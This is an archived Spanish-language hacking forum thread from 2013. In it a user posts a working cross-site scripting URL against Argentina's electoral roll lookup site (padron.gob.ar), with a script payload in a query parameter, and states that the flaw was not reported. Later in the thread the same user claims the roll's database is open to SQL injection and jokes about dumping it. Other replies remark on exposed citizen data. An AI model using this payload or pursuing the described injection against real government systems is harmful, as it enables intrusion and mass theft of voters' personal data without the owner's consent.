[XSS] padron.gob.ar

ANTRAX · Mayo 17, 2013, 02:15:03 PM

XSS en el padron electoral de Argentina

Reportado: NO
URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/www.padron.gob.ar/consulta/version_impresa.php?x_mat=111111111&x_ape=%3Cscript%3Ealert%28%27ANTRAX%27%29%3C/script%3E&x_nom=los%20nonamesx_sec=7&x_cir=57&x_dess=LaConChinChina&x_desc=CIUDAD&x_desl=&x_dirl=&x_locl=&x_mes=0&x_det=&x_par=0&x_dis=&x_dom=CalleFalsa%20123&x_pro=&x_tip=DNI-EA&x_padron=&x_orden=

hielasangre · Mayo 17, 2013, 05:26:00 PM

Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B

ANTRAX · Mayo 17, 2013, 05:36:33 PM

Hablando de datos expuestos...

StuXn3t · Mayo 17, 2013, 06:00:20 PM

Wow....buen aporte Antrax!
Con eso se demuestra el riesgo de las Aplicaciones Web....

hielasangre · Mayo 17, 2013, 06:35:29 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hablando de datos expuestos...

Me mato de Gorila antes que planero xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

s3cur1tyr00t · Mayo 17, 2013, 07:02:32 PM

Mmm, si investigan un poquito mas se van a dar cuenta que estan bastante mas fregados que un XSS en la aplicación

ANTRAX · Mayo 17, 2013, 07:07:42 PM

Es un desastre... La base de datos del padron de Argentina tiene un SQLi... Lastima que son muchas tablas sino la bajaba ajajaja

[XSS] padron.gob.ar

ANTRAX

Mayo 17, 2013, 02:15:03 PM Ultima modificación: Enero 10, 2015, 01:10:19 PM por Expermicid

hielasangre

Mayo 17, 2013, 05:26:00 PM #1

ANTRAX

Mayo 17, 2013, 05:36:33 PM #2

StuXn3t

Mayo 17, 2013, 06:00:20 PM #3

hielasangre

Mayo 17, 2013, 06:35:29 PM #4

s3cur1tyr00t

Mayo 17, 2013, 07:02:32 PM #5

ANTRAX

Mayo 17, 2013, 07:07:42 PM #6